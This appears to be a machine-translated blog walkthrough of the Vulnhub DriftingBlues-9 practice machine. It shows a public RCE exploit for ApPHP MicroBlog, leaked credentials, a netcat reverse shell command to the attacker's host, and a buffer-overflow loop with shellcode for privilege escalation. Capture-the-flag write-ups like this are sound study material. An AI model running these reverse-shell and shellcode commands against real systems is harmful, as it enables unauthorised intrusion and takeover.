当前位置:网站首页>After reading this article, I will teach you to play with the penetration test target vulnhub - drivetingblues-9
After reading this article, I will teach you to play with the penetration test target vulnhub - drivetingblues-9
2022-07-03 01:27:00 【Lonely fish】
Vulnhub Drone aircraft DriftingBlues-9 Penetration test details
Vulnhub Introduction to target machine :
vulnhub It is a comprehensive shooting range providing various vulnerability platforms , A variety of virtual machines can be downloaded , Local VM Open the can , Complete the penetration test like a game 、 Raise the right 、 Exploit 、 Code audit and other interesting actual combat .
Update this issue Vulnhub DriftingBlues series I still found it as usual FLAG that will do , May be biased towards CTF spot .
Vulnhub Target download :
Official website address :https://www.vulnhub.com/entry/driftingblues-9-final,695/

After downloading, unzip the installation package Then try VMware that will do .
Vulnhub Detailed explanation of target vulnerability :
①: information gathering :
kali Use in netdiscover Discover the host 
Infiltration machine :kali IP :192.168.205.133 Drone aircraft IP :192.168.205.145
Use command :
nmap -sS -A -T4 -n 192.168.205.145

Open the 80 Port and 111 port As usual, visit first 80 port Look directly at the source code Found out ApPHP MicroBlog edition by v.1.0.1( The first time I met )

②: Exploit :
Use searchsploit Search for related vulnerabilities The second one can be used

Use the command to copy the script to the local :searchsploit -m php/webapps/33070.py
Use python2 Execute the script :python2 ./33070.py http://192.168.205.145
Found database information There is an account number and password Namely :clapton/yaraklitepe
Use command :ls /home Discovery is the same as data users It's fine too cat /etc/passwd Check to see if there is nc: whish nc


③: rebound shell:
stay kali Turn on nc monitor :nc -lvp 6666
stay shell perform :nc 192.168.205.133 6666 -e /bin/bash
Use command interaction shell:python -c 'import pty;pty.spawn("/bin/bash")'

Try switching users :clapton / yaraklitepe Got the first flag

④: Buffer overflow right extraction :
Tips here Buffer is the solution ( What buffer !!! The first encounter will not pwn)
for i in {
1..10000}; do (./input $(python -c 'print("A" * 171 + "\x10\x0c\x97\xbf" + "\x90"* 1000 + "\x31\xc9\xf7\xe1\x51\xbf\xd0\xd0\x8c\x97\xbe\xd0\x9d\x96\x91\xf7\xd7\xf7\xd6\x57\x56\x89\xe3\xb0\x0b\xcd\x80")')); done
Specific reference :https://www.ngui.cc/article/show-373956.html
https://blog.csdn.net/qq_32261191/article/details/117908644
⑤: obtain flag:

So far, we have obtained all flag, End of penetration test .
Vulnhub Target penetration summary :
①:searchsploit Tool usage
②:RCE Exploit
③: Buffer overflow right extraction ( Because there is no foundation, it is not very Follow up in learning )
This is also DriftingBlues Study of the last target aircraft in the series , I hope you can also learn some new knowledge points and some penetration testing ideas
Finally, creation is not easy I hope that's helpful !!
边栏推荐
- Database SQL language 02 connection query
- [self management] time, energy and habit management
- d. LDC build shared library
- Leetcode 2097 - Legal rearrangement of pairs
- The R language uses the ctree function in the party package to build conditional inference decision trees, uses the plot function to visualize the trained conditional inference decision tree, and the
- 机器学习术语
- Assets, vulnerabilities, threats and events of the four elements of safe operation
- MySQL foundation 04 MySQL architecture
- 攻克哈希的基本概念与实现
- 信息熵的基础
猜你喜欢
![[FPGA tutorial case 6] design and implementation of dual port RAM based on vivado core](/img/fb/c371ffaa9614c6f2fd581ba89eb2ab.png)
[FPGA tutorial case 6] design and implementation of dual port RAM based on vivado core
![[C language] detailed explanation of pointer and array written test questions](/img/24/c2c372b5c435cbd6eb83ac34b68034.png)
[C language] detailed explanation of pointer and array written test questions

Matlab Doppler effect produces vibration signal and processing

Esp32 simple speed message test of ros2 (limit frequency)

力扣 204. 计数质数

强化学习 Q-learning 实例详解

12_ Implementation of rolling automatic video playback effect of wechat video number of wechat applet
![leetcode:871. Minimum refueling times [Pat has done before + maximum stacking + greed]](/img/2c/8ec3926243fac8db9ed45d8053f3af.png)
leetcode:871. Minimum refueling times [Pat has done before + maximum stacking + greed]

Using tensorboard to visualize the model, data and training process

How is the mask effect achieved in the LPL ban/pick selection stage?
随机推荐
2022 cable crane driver examination registration and cable crane driver certificate examination
[Arduino experiment 17 L298N motor drive module]
Why can't the start method be called repeatedly? But the run method can?
[fh-gfsk] fh-gfsk signal analysis and blind demodulation research
1696C. Fishingprince Plays With Array【思维题 + 中间状态 + 优化存储】
Appuyez sur l'apprentissage de l'esprit de frappe - reconnaissance des coordonnées de fond multithreadées
【我的OpenGL学习进阶之旅】关于欧拉角、旋转顺序、旋转矩阵、四元数等知识的整理
【FPGA教程案例5】基于vivado核的ROM设计与实现
d,ldc構建共享庫
Key wizard play strange learning - front desk and Intranet send background verification code
【第29天】给定一个整数,请你求出它的因子数
2022 Jiangxi Provincial Safety Officer B certificate reexamination examination and Jiangxi Provincial Safety Officer B certificate simulation examination question bank
MySQL - database query - condition query
按键精灵打怪学习-自动寻路回打怪点
kivy教程之在 Kivy App 中使用 matplotlib 的示例
[self management] time, energy and habit management
MySQL basic usage 02
Strongly connected components of digraph
Niu Ke swipes questions and clocks in
leetcode 2097 — 合法重新排列数对